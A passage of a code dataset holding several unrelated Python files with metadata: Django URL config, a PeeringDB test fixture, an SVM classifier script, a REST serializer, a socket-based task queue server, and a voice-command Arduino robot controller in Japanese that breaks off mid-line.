'home.views.handler500'\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^admin/', include(admin.site.urls)),\n)\n\nurlpatterns = patterns('',\n\turl(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\turl(r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEVELOPMENT:\n\turlpatterns += staticfiles_urlpatterns()\n\turlpatterns += patterns('',\n\t\turl(r'^media/(?P.*)$', 'django.views.static.serve', {\n\t\t'document_root': settings.MEDIA_ROOT,\n\t\t}),\n\t)\n\t\nurlpatterns += patterns('',\n\t(r'^robots\\.txt$', lambda request: HttpResponse(\"User-agent: *\\nDisallow: \", mimetype=\"text/plain\")),\n\t(r'^favicon.ico$', 'django.views.generic.simple.redirect_to', \n\t\t{'url': settings.STATIC_URL + 'shared/images/favicon.ico'}),\n)\n\nurlpatterns += patterns('',\n\t(r'^', include('home.urls')),\n\t(r'^search/', include('haystack.urls')),\n)\n", "sub_path": "urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2169, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 33, "usage_type": "name"}, {"api_name": "settings.DEVELOPMENT", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.contrib.staticfiles.urls.staticfiles_urlpatterns", "line_number": 37, "usage_type": "call"}, {"api_name": "django.conf.urls.patterns", "line_number": 38, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}, {"api_name": "settings.MEDIA_ROOT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.urls.patterns", "line_number": 44, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 45, "usage_type": "call"}, {"api_name": "settings.STATIC_URL", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.conf.urls.patterns", "line_number": 50, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 51, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "401488339", "text": "from django.test import TestCase\nfrom django.contrib.auth.models import Group, AnonymousUser\nimport peeringdb_server.models as models\nimport django_namespace_perms as nsp\n\n\nclass ClientCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n # create user and guest group\n\n guest_group = Group.objects.create(name=\"guest\")\n user_group = Group.objects.create(name=\"user\")\n\n cls.guest_user = models.User.objects.create_user(\n \"guest\", \"guest@localhost\", \"guest\")\n guest_group.user_set.add(cls.guest_user)\n\n nsp.models.GroupPermission.objects.create(\n group=guest_group, namespace=\"peeringdb.organization\",\n permissions=0x01)\n\n nsp.models.GroupPermission.objects.create(\n group=user_group, namespace=\"peeringdb.organization\",\n permissions=0x01)\n\n nsp.models.GroupPermission.objects.create(\n group=user_group,\n namespace=\"peeringdb.organization.*.network.*.poc_set.users\",\n permissions=0x01)\n\n nsp.models.GroupPermission.objects.create(\n group=guest_group,\n namespace=\"peeringdb.organization.*.network.*.poc_set.public\",\n permissions=0x01)\n", "sub_path": "tests/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1225, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.test.TestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.create", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.create", "line_number": 13, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 13, "usage_type": "name"}, {"api_name": "peeringdb_server.models.User.objects.create_user", "line_number": 15, "usage_type": "call"}, {"api_name": "peeringdb_server.models.User", "line_number": 15, "usage_type": "attribute"}, {"api_name": "peeringdb_server.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django_namespace_perms.models.GroupPermission.objects.create", "line_number": 19, "usage_type": "call"}, {"api_name": "django_namespace_perms.models", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django_namespace_perms.models.GroupPermission.objects.create", "line_number": 23, "usage_type": "call"}, {"api_name": "django_namespace_perms.models", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django_namespace_perms.models.GroupPermission.objects.create", "line_number": 27, "usage_type": "call"}, {"api_name": "django_namespace_perms.models", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django_namespace_perms.models.GroupPermission.objects.create", "line_number": 32, "usage_type": "call"}, {"api_name": "django_namespace_perms.models", "line_number": 32, "usage_type": "attribute"}]}
+{"seq_id": "187384124", "text": "from sklearn import svm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import cross_val_score\nfrom mlxtend.evaluate import bias_variance_decomp\nfrom sklearn import metrics\nimport pandas as pd\nimport os\n\nheadings = ['Hour 0', 'Hour 1', 'Hour 2', 'Hour 3', 'Hour 4', 'Hour 5', 'Hour 6', 'Hour 7', 'Hour 8', 'Hour 9',\n 'Hour 10', 'Hour 11', 'Hour 12', 'Hour 13', 'Hour 14', 'Hour 15', 'Hour 16', 'Hour 17', 'Hour 18',\n 'Hour 19', 'Hour 20', 'Hour 21', 'Hour 22', 'Hour 23', 'Label']\n\n# Importing the training/testing txt dataset using pandas, with custom headings\ntraining_set = pd.read_csv(\"TrainingData.txt\", sep=',', names=headings)\nheadings.pop()\ntesting_set = pd.read_csv(\"TestingData.txt\", sep=',', names=headings)\n\n# Display datasets\nprint(\"-------- Displaying training data set --------\")\nprint(training_set.head())\nprint(training_set.tail())\n\nprint(\"\\n-------- Displaying testing data set --------\")\nprint(testing_set.head())\nprint(testing_set.tail())\n\n# grab the 5000 0's or 1's columns to train on\nY = training_set['Label']\n\n# grab all hour columns\nX = training_set[\n ['Hour 0', 'Hour 1', 'Hour 2', 'Hour 3', 'Hour 4', 'Hour 5', 'Hour 6', 'Hour 7', 'Hour 8', 'Hour 9', 'Hour 10',\n 'Hour 11', 'Hour 12', 'Hour 13', 'Hour 14', 'Hour 15', 'Hour 16', 'Hour 17', 'Hour 18', 'Hour 19', 'Hour 20',\n 'Hour 21', 'Hour 22', 'Hour 23']]\n\n# Uncomment these two lines to calculate an estimated mse, bias and variance\n# data = training_set.values\n# X, Y = data[:, :-1], data[:, -1]\n\n# Split the training set 70% testing / 30% training, and randomise data selected\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=0)\n\n# Create a class linear svm classifier\nclassifier = svm.SVC(kernel='linear', C=1, random_state=42)\n\n# Train the classifier\nclassifier.fit(X_train, Y_train)\n\n# Perform cross validation to avoid bias\nscores = cross_val_score(classifier, X, Y, cv=5)\nprint(\"\\nCross Validation Scores: \", scores)\nprint(\"%0.2f accuracy with a standard deviation of %0.2f\" % (scores.mean(), scores.std()))\n\n# Uncomment these lines to estimate bias and variance\n# mse, bias, var = bias_variance_decomp(classifier, X_train, Y_train, X_test, Y_test, loss='mse', num_rounds=200, random_seed=1)\n# # summarize results\n# print('MSE: %.3f' % mse)\n# print('Bias: %.3f' % bias)\n# print('Variance: %.3f' % var)\n\n# Grab predicted results\nY_predicted = classifier.predict(X_test)\n\n# Print how accurate the model is\nprint(\"\\nAccuracy: \", metrics.accuracy_score(Y_test, Y_predicted))\n# Print some analysis metrics\nprint(\"\\nconfusion matrix: \\n\", confusion_matrix(Y_test, Y_predicted))\nprint(\"\\nreport: \\n\", classification_report(Y_test, Y_predicted))\n\n# Use trained classifier on the testing set (100 unlabelled curves)\nprediction_results = classifier.predict(testing_set)\n\n# Print the prediction results\nprint(\"\\nPredicted Labels: \", prediction_results)\n\n# Output a TestingResults.txt file\nos.remove(\"TestingResults.txt\")\ntesting_set[\"Label\"] = prediction_results\ntesting_set.to_csv('TestingResults.txt', header=None, index=None, sep=',', mode='a')\n\n# Display classified results datasets\ntesting_results = pd.read_csv(\"TestingResults.txt\", sep=',', header=None)\nprint(\"\\n -------- Displaying training data set --------\")\nprint(testing_results.head())\nprint(testing_results.tail())\nprint(testing_results.shape)\n", "sub_path": "Python Project/SVMClassifier.py", "file_name": "SVMClassifier.py", "file_ext": "py", "file_size_in_byte": 3463, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 45, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 66, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 69, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "552643112", "text": "from rest_framework.serializers import(\n HyperlinkedIdentityField,\n ModelSerializer,\n RelatedField,\n CharField,\n ImageField,\n SerializerMethodField\n)\n\nfrom blogs.models import Post\nfrom comments.models import Comment\nfrom comments.api.serializers import CommentSerializer\n\n\nclass PostDetailSerializer(ModelSerializer):\n username = CharField(source='author.username', read_only=True)\n author_image = ImageField(\n source='author.profile.image', read_only=True)\n comments = SerializerMethodField()\n\n class Meta:\n model = Post\n fields = '__all__'\n\n def get_comments(self, obj):\n c_qs = Comment.objects.filter_by_instance(obj)\n comments = CommentSerializer(c_qs, many=True).data\n return comments\n", "sub_path": "blogs/api/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 15, "usage_type": "name"}, {"api_name": "rest_framework.serializers.CharField", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ImageField", "line_number": 17, "usage_type": "call"}, {"api_name": "comments.models", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.serializers.SerializerMethodField", "line_number": 19, "usage_type": "call"}, {"api_name": "blogs.models.Post", "line_number": 22, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter_by_instance", "line_number": 26, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 26, "usage_type": "name"}, {"api_name": "comments.models", "line_number": 27, "usage_type": "name"}, {"api_name": "comments.api.serializers.CommentSerializer", "line_number": 27, "usage_type": "call"}, {"api_name": "comments.models", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "370147312", "text": "import logging\nimport socketserver\nimport multiprocessing\n\nfrom .helpers import load_task\nfrom . import worker\nfrom . import helpers\nimport django\n\nlog = logging.getLogger(__name__)\n\n\nDcommands = {}\n\n\nclass Pool(object):\n def __init__(self):\n self.queue = multiprocessing.Queue()\n self.worker = multiprocessing.Process(target=worker.target, args=(self.queue,))\n\n\nclass TaskSocketServer(socketserver.BaseRequestHandler):\n DEFAULT_POOL = 'default'\n # pools holds a mapping from pool names to process objects\n pools = {}\n\n def handle(self):\n try:\n data = self.request.recv(5000).strip()\n if data in Dcommands.keys():\n log.info('Got command: \"{}\"'.format(data))\n try:\n worker_response = Dcommands[data]()\n response = (True, worker_response.encode(),)\n self.request.send(str(response).encode())\n except Exception as e:\n log.exception(\"command failed\")\n response = (False, \"TaskServer Command: {}\".format(e).encode(),)\n self.request.send(str(response).encode())\n else:\n # assume a serialized task\n log.info('Got a task')\n try:\n task_id = int(data.decode())\n \n # Connection are closed by tasks, force it to reconnect\n django.db.connections.close_all()\n queued_task = load_task(task_id=task_id)\n \n # Ensure pool got a worker processing it\n pool_name = queued_task.pool or self.DEFAULT_POOL\n pool = self.pools.get(pool_name)\n if pool is None or not pool.worker.is_alive():\n # Spawn new pool\n log.info('Spawning new pool: {}'.format(pool_name))\n self.pools[pool_name] = Pool()\n self.pools[pool_name].worker.start()\n\n task = helpers.unpack(queued_task.pickled_task)\n self.pools[pool_name].queue.put(task)\n\n response = (True, \"sent\")\n self.request.send(str(response).encode())\n except Exception as e:\n log.exception(\"failed to queue task\")\n response = (False, \"TaskServer Put: {}\".format(e).encode(),)\n self.request.send(str(response).encode())\n\n except OSError as e:\n # in case of network error, just log\n log.exception(\"network error\")\n\n def finish(self):\n for pool in self.pools.values():\n pool.queue.put(None)\n", "sub_path": "django_leek/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 2756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 18, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 19, "usage_type": "call"}, {"api_name": "socketserver.BaseRequestHandler", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.db.connections.close_all", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db", "line_number": 47, "usage_type": "attribute"}, {"api_name": "helpers.load_task", "line_number": 48, "usage_type": "call"}, {"api_name": "helpers.unpack", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "487755035", "text": "#coding:utf-8\n\n#シリアル通信で文字をArduino側に送信\n#なぜかシリアルモニタを開かないといけないことがある\n\n# エラーパターン記録\n# 右手上げないでに対して\n# 右てあげないで -> なし\n# 見て 手上げないで -> 両手を上\n# 聞いてあげないで -> 無し\n# 手を挙げないで ->無し\n# 携帯を上に上げないで\n# 上に上げないで\n\nimport sys #デバッグ用\n\nimport serial #モジュール名はpyserialだが, importする際はserialである\n\nimport speech_recognition as sr\n\n\ndef python2arduino(text):\n with serial.Serial('/dev/ttyACM0', 9600, timeout=1) as ser:\n # while True:\n # flag=bytes(input(),'utf-8')\n # flag = input()\n # flag += '\\0'\n flag=bytes(\"{}\\0\".format(text), 'utf-8')\n # flag=bytes('test', 'utf-8')\n # flag=\"test\"\n\n #シリアル通信で文字を送信する際は, byte文字列に変換する\n #input()する際の文字列はutf-8\n\n # ser.write(flag.encode('utf-8'))\n ser.write(flag)\n print(flag)\n\n #シリアル通信:送信\n\n # if(flag==bytes('a','utf-8')):\n # break;\n\n # line = ser.readline() # 行終端'¥n'までリードする\n # print(line)\n # str=ser.read(100)\n # print(str.decode('utf-8'), end='\\n')\n # sys.stdout.buffer(str)\n # ser.close()\n\ndef voice2text():\n \"\"\"\n https://futurismo.biz/speech-recognition-with-python/\n \"\"\"\n\n r = sr.Recognizer()\n mic = sr.Microphone(sample_rate=44100)\n\n with mic as source:\n r.adjust_for_ambient_noise(source)\n audio = r.listen(source)\n\n text = r.recognize_google(audio, language='ja-JP')\n print(text)\n return text\n\ndef text2coordinate(text):\n \"\"\"\n ~compare\n 初期値:-1\n 上げるとき:1\n 下げるとき:0\n \"\"\"\n\n if \"恥\" in text or \"やだ\" in text or \"ヤダ\" in text or \"嫌\" in text or \"いや\" in text or \"おかしい\" in text:\n return \"07,\"\n elif \"こんにちは\" in text or \"あいさつ\" in text or \"挨拶\" in text or \"印刷\" in text:\n return \"05,\"\n elif \"自己紹介\" in text or \"名前\" in text:\n return \"08,\"\n elif \"準備\" in text:\n return \"99,\"\n elif \"ダンス\" in text or \"踊\" in text or \"おどって\" in text:\n return \"10,\"\n elif \"紹介\" in text or \"名前\" in text:\n return \"08,\"\n\n right_arm_compare = -1\n left_arm_compare = -1\n right_leg_compare = -1\n left_leg_compare = -1\n\n if \"終\" in text:\n return \"-1\"\n\n # 手\n if \"両手\" in text or \"両腕\" in text or \"料理\" in text:\n if \"上げない\" in text or \"挙げない\" in text or \"あげない\" in text or \"揚げない\" in text:\n print(\"mode: 両手を下\")\n right_arm_compare = 0\n left_arm_compare = 0\n elif \"上\" in text or \"挙\" in text or \"あげ\" in text or \"揚げ\" in text:\n print(\"mode: 両手を上\")\n right_arm_compare = 1\n left_arm_compare = 1\n elif \"下げない\" in text or \"降ろさない\" in text or \"おろさない\" in text or \"さげない\" in text:\n print(\"mode: 両手を上\")\n right_arm_compare = 1\n left_arm_compare = 1\n elif \"下\" in text or \"降\" in text or \"おろ\" in text or \"さげ\" in text:\n print(\"mode: 両手を下\")\n right_arm_compare = 0\n left_arm_compare = 0\n else:\n print(\"入力に両手が含まれていますがパターンに合致しませんでした。\")\n\n elif (\"右手\" in text and \"左手\" not in text) or (\"右腕\" in text and \"左腕\" not in text) or \"赤\" in text or \"カイロ\" in text:\n if \"上げない\" in text or \"挙げない\" in text or \"あげない\" in text or \"揚げない\" in text:\n print(\"mode: 右手を下\")\n right_arm_compare = 0\n elif \"下げない\" in text or \"降ろさない\" in text or \"おろさない\" in text or \"さげない\" in text:\n print(\"mode: 右手を上\")\n right_arm_compare = 1\n elif \"上\" in text or \"挙\" in text or \"あげ\" in text or \"揚げ\" in text:\n print(\"mode: 右手を上\")\n right_arm_compare = 1\n elif \"下\" in text or \"降\" in text or \"おろ\" in text or \"さげ\" in text:\n print(\"mode: 右手を下\")\n right_arm_compare = 0\n\n elif (\"左手\" in text and \"右手\" not in text) or (\"左腕\" in text and \"右腕\" not in text) or \"白\" in text:\n if \"上げない\" in text or \"挙げない\" in text or \"あげない\" in text or \"揚げない\" in text:\n print(\"mode: 左手を下\")\n left_arm_compare = 0\n elif \"下げない\" in text or \"降ろさない\" in text or \"おろさない\" in text or \"さげない\" in text:\n print(\"mode: 左手を上\")\n left_arm_compare = 1\n elif \"上\" in text or \"挙\" in text or \"あげ\" in text or \"揚げ\" in text:\n print(\"mode: 左手を上\")\n left_arm_compare = 1\n elif \"下\" in text or \"降\" in text or \"おろ\" in text or \"さげ\" in text:\n print(\"mode: 左手を下\")\n left_arm_compare = 0\n\n elif right_arm_compare == -1 and (\"右手\" in text or \"右腕\" in text):\n if \"右手を上げない\" in text or \"右手を挙げない\" in text or \"右手をあげない\" in text or \"右手を揚げない\" in text or \"右腕を上げない\" in text or \"右腕を挙げない\" in text or \"右腕をあげない\" in text or \"右腕を揚げない\" in text:\n print(\"mode: 右手を下\")\n right_arm_compare = 0\n elif \"右手を下げない\" in text or \"右手を降ろさない\" in text or \"右手をおろさない\" in text or \"右手をさげない\" in text or \"右腕を下げない\" in text or \"右腕を降ろさない\" in text or \"右腕をおろさない\" in text or \"右腕をさげない\" in text:\n print(\"mode: 右手を上\")\n right_arm_compare = 1\n elif \"右手を上\" in text or \"右手を挙\" in text or \"右手をあげ\" in text or \"右腕を上\" in text or \"右腕を挙\" in text or \"右腕をあげ\" in text:\n print(\"mode: 右手を上\")\n right_arm_compare = 1\n elif \"右手を下\" in text or \"右手を降\" in text or \"右手をおろ\" in text or \"右手をさげ\" in text or \"右腕を下\" in text or \"右腕を降\" in text or \"右腕をおろ\" in text or \"右腕をさげ\" in text:\n print(\"mode: 右手を下\")\n right_arm_compare = 0\n\n elif left_arm_compare == -1 and (\"左手\" in text or \"左腕\" in text):\n if \"左手を上げない\" in text or \"左手を挙げない\" in text or \"左手をあげない\" in text or \"左手を揚げない\" in text or \"左腕を上げない\" in text or \"左腕を挙げない\" in text or \"左腕をあげない\" in text or \"左腕を揚げない\" in text:\n print(\"mode: 左手を下\")\n left_arm_compare = 0\n elif \"左手を下げない\" in text or \"左手を降ろさない\" in text or \"左手をおろさない\" in text or \"左手をさげない\" in text or \"左腕を下げない\" in text or \"左腕を降ろさない\" in text or \"左腕をおろさない\" in text or \"左腕をさげない\" in text:\n print(\"mode: 左手を上\")\n left_arm_compare = 1\n elif \"左手を上\" in text or \"左手を挙\" in text or \"左手をあげ\" in text or \"左腕を上\" in text or \"左腕を挙\" in text or \"左腕をあげ\" in text:\n print(\"mode: 左手を上\")\n left_arm_compare = 1\n elif \"左手を下\" in text or \"左手を降\" in text or \"左手をおろ\" in text or \"左手をさげ\" in text or \"左腕を下\" in text or \"左腕を降\" in text or \"左腕をおろ\" in text or \"左腕をさげ\" in text:\n print(\"mode: 左手を下\")\n left_arm_compare = 0\n\n elif right_arm_compare == -1 and left_arm_compare == -1 and (\"手\" in text or \"腕\" in text):\n if \"上げない\" in text or \"挙げない\" in text or \"あげない\" in text or \"揚げない\" in text:\n print(\"mode: 両手を下\")\n right_arm_compare = 0\n left_arm_compare = 0\n elif \"下げない\" in text or \"降ろさない\" in text or \"おろさない\" in text or \"さげない\" in text:\n print(\"mode: 両手を上\")\n right_arm_compare = 1\n left_arm_compare = 1\n elif \"上\" in text or \"挙\" in text or \"あげ\" in text or \"揚げ\" in text:\n print(\"mode: 両手を上\")\n right_arm_compare = 1\n left_arm_compare = 1\n elif \"下\" in text or \"降\" in text or \"おろ\" in text or \"さげ\" in text:\n print(\"mode: 両手を下\")\n right_arm_compare = 0\n left_arm_compare = 0\n\n elif right_arm_compare == -1 and left_arm_compare == -1:\n print(\"other\")\n if \"右\" and \"空\" in text:\n print(\"mode: 右手を上\")\n right_arm_compare = 1\n elif \"左\" and \"空\" in text:\n print(\"mode: 左手を上\")\n left_arm_compare = 1\n elif \"空\" in text:\n print(\"mode: 両手を上\")\n right_arm_compare = 1\n left_arm_compare = 1\n elif \"ヒーロー\" in text and \"揚げない\" in text:\n print(\"mode: 白〜左下げる\")\n left_arm_compare = 0\n elif \"それないで\" in text:\n print(\"mode: 白〜左下げない\")\n left_arm_compare = 1\n elif \"上げない\" in text or \"揚げない\" in text:\n print(\"mode: 両手を下\")\n right_arm_compare = 0\n left_arm_compare = 0\n elif \"下げない\" in text or \"降ろさない\" in text or \"さげない\" in text:\n print(\"mode: 両手を上\")\n right_arm_compare = 1\n left_arm_compare = 1\n elif \"上\" in text or \"揚げ\" in text or \"あげ\" in text:\n print(\"mode: 両手を上\")\n right_arm_compare = 1\n left_arm_compare = 1\n elif \"下\" in text or \"降\" in text:\n print(\"mode: 両手を下\")\n right_arm_compare = 0\n left_arm_compare = 0\n elif \"ゆであげて\" in text or \"見ててあげない\" in text or \"見れてあげて\" in text or \"入れてあげて\" in text:\n print(\"mode: 右手を上\")\n right_arm_compare = 1\n elif \"ゆであげないで\" in text:\n print(\"mode: 右手を下\")\n right_arm_compare = 0\n elif \"ゲーム\" in text and \"あげない\" in text:\n print(\"mode: 右手を下\")\n right_arm_compare = 0\n elif \"見てて\" in text and \"あげて\" in text:\n print(\"mode: 右手を下\")\n right_arm_compare = 0\n elif \"あげない\" in text:\n print(\"mode: 両手を下\")\n right_arm_compare = 0\n left_arm_compare = 0\n elif \"あげ\" in text:\n print(\"mode: 両手を上\")\n right_arm_compare = 1\n left_arm_compare = 1\n\n elif \"おろさない\" in text or \"さげない\" in text:\n print(\"mode: 両手を上\")\n right_arm_compare = 1\n left_arm_compare = 1\n elif \"おろ\" in text or \"さげ\" in text:\n print(\"mode: 両手を下\")\n right_arm_compare = 0\n left_arm_compare = 0\n elif \"飛騨牛\" in text or \"やり手\" in text:\n if \"上げない\" in text or \"挙\" in text:\n print(\"mode: 左手を下\")\n left_arm_compare = 0\n elif \"下げない\" in text or \"降ろさない\" in text:\n print(\"mode: 左手を上\")\n left_arm_compare = 1\n elif \"上\" in text or \"挙\" in text:\n print(\"mode: 左手を上\")\n left_arm_compare = 1\n elif \"下\" in text or \"降\" in text:\n print(\"mode: 左手を下\")\n left_arm_compare = 0\n\n\n if \"両足\" in text:\n if \"出さない\" in text:\n print(\"mode: 両足を後\")\n left_leg_compare = 1\n left_leg_compare = 1\n elif \"戻さない\" in text:\n print(\"mode: 両足を後\")\n right_leg_compare = 1\n left_leg_compare = 1\n elif \"前\" in text:\n print(\"mode: 両足を前\")\n right_leg_compare = 0\n left_leg_compare = 0\n elif \"後\" in text:\n print(\"mode: 両足を後\")\n right_leg_compare = 1\n left_leg_compare = 1\n elif \"戻\" in text:\n print(\"mode: 両足を前\")\n right_leg_compare = 0\n left_leg_compare = 0\n\n elif \"右足\" in text and \"左足\" not in text:\n if \"出さない\" in text:\n print(\"mode: 右足を後\")\n right_leg_compare = 1\n elif \"戻さない\" in text:\n print(\"mode: 右足を後\")\n right_leg_compare = 1\n elif \"前\" in text:\n print(\"mode: 右足を前\")\n right_leg_compare = 0\n elif \"後\" in text:\n print(\"mode: 右足を後\")\n right_leg_compare = 1\n elif \"戻\" in text:\n print(\"mode: 右足を前\")\n right_leg_compare = 0\n\n elif \"左足\" in text and \"右足\" not in text:\n if \"出さない\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 1\n elif \"戻さない\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 1\n elif \"前\" in text:\n print(\"mode: 左足を前\")\n left_leg_compare = 0\n elif \"後\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 1\n elif \"戻\" in text:\n print(\"mode: 左足を前\")\n left_leg_compare = 0\n elif right_leg_compare == -1 and \"右足\" in text:\n if \"右足を前に出さない\" in text:\n print(\"mode: 右足を後\")\n right_leg_compare = 1\n elif \"右足を後ろに戻さない\" in text:\n print(\"mode: 右足を後\")\n right_leg_compare = 1\n elif \"右足を前\" in text:\n print(\"mode: 右足を前\")\n right_leg_compare = 0\n elif \"右足を後\" in text:\n print(\"mode: 右足を後\")\n right_leg_compare = 1\n elif \"右足を出さない\" in text:\n print(\"mode: 右足を後\")\n right_leg_compare = 1\n elif \"右足を戻さない\" in text:\n print(\"mode: 右足を後\")\n right_leg_compare = 1\n elif \"右足を出\" in text:\n print(\"mode: 右足を前\")\n right_leg_compare = 0\n elif \"右足を戻\" in text:\n print(\"mode: 右足を後\")\n right_leg_compare = 1\n elif left_leg_compare == -1 and \"左足\" in text:\n if \"左足を前に出さない\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 1\n elif \"左足を後ろに戻さない\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 1\n elif \"左足を前\" in text:\n print(\"mode: 左足を前\")\n left_leg_compare = 0\n elif \"左足を後\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 1\n elif \"左足を出さない\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 1\n elif \"左足を戻さない\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 1\n elif \"左足を出\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 0\n elif \"左足を戻\" in text:\n print(\"mode: 左足を後\")\n left_leg_compare = 0\n\n elif right_arm_compare == -1 and left_arm_compare == -1 and (\"足\" in text or \"脚\" in text):\n if \"出さない\" in text:\n print(\"mode: 両足を後\")\n right_leg_compare = 1\n left_leg_compare = 1\n elif \"戻さない\" in text:\n print(\"mode: 両足を後\")\n right_leg_compare = 1\n left_leg_compare = 1\n elif \"戻\" in text:\n print(\"mode: 両足を前\")\n right_leg_compare = 0\n left_leg_compare = 0\n elif \"前\" in text:\n print(\"mode: 両足を前\")\n right_leg_compare = 0\n left_leg_compare = 0\n elif \"後\" in text:\n print(\"mode: 両足を後\")\n left_leg_compare = 1\n left_leg_compare = 1\n\n elif right_leg_compare == -1 and left_leg_compare == -1:\n if \"出さない\" in text:\n print(\"mode: 両足を後\")\n left_leg_compare = 1\n left_leg_compare = 1\n elif \"前\" in text:\n print(\"mode: 両足を前\")\n right_leg_compare = 0\n left_leg_compare = 0\n elif \"後\" in text:\n print(\"mode: 両足を後\")\n left_leg_compare = 1\n left_leg_compare = 1\n\n if \"最初\" in text:\n right_arm_compare = 0\n left_arm_compare = 0\n right_leg_compare = 0\n left_leg_compare = 0\n\n if \"リセット\" in text:\n return \"03,\"\n\n if(right_arm_compare==-1 and left_arm_compare == -1 and right_leg_compare == -1 and left_leg_compare == -1):\n return \"-1\"\n\n\n ret = \"02,\" + str(right_arm_compare) + \",\" + str(left_arm_compare) + \",\" + str(right_leg_compare) + \",\" + str(left_leg_compare)\n\n return ret\n\ndef main(mode, command_input):\n # while(1):\n # print(\"init\")\n if(mode==0):\n text = voice2text()\n command = text2coordinate(text)\n if command == \"-1\":\n return \"end\"\n elif(mode==1):\n command = text2coordinate(command_input)\n if command == \"-1\":\n return \"end\"\n elif(mode==2):\n command = \"02,\" + command_input\n elif(mode==99):\n command = command_input\n\n python2arduino(command)\n print(\"送信済み: {}\".format(command))\n\n\nif __name__ == \"__main__\":\n if (len(sys.argv)==2):\n if (sys.argv[1] == \"99\"):\n # モード切替\n mode = 99\n command_input = \"99,\"\n elif (sys.argv[1] == 